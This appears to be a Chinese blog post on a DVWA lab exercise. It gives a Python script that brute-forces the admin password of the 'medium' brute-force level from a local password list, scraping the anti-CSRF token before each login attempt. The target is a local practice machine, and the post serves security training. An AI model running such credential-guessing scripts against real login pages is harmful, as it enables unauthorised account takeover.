dvwa - brute force - middle -python-python3模拟使用本地密码库进行暴力破解dvwa中级难度的密码

时隔一年后看这个标题,自己也有点懵逼。

加点说明吧。

dvwa是渗透测试靶机系统,好像有10钟类型漏洞;

现在用python模拟使用本地密码库进行暴力破解中级难度的密码:

密码文件psw.txt跟python文件同级目录下,内容:

111
222
password
444
5555555555555555

test.py内容如下:

import requests
import re,time

head = {
            'Host': '192.168.1.70',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
            'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Referer': r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=111&Login=Login&user_token=bbf84925fed8ba075c4e8b39f370e9bc',
            'Accept-Language': r'zh-CN,zh;q=0.9',
            'Cookie': 'security=high; PHPSESSID=61b69n6238mpdhu05puisaok00', #登录后复制PHPSESSID
            'Connection': 'close'
        }

file = open('psw.txt','r')
url = r'http://192.168.1.70/dvwa/vulnerabilities/brute/'
dvwa_session = requests.Session()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))
for line in file:
    resp = dvwa_session.get(url=url, headers=head)
    token = re.search(r'[a-z0-9]{32}',resp.text).group()
    password = line.rstrip()

    url2 = r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=' + password + '&Login=Login&user_token=' +str(token)
    res = dvwa_session.get(url=url2,headers=head)

    print(password.strip(),len(res.text))
file.close()

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

生命的脚步从不停歇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值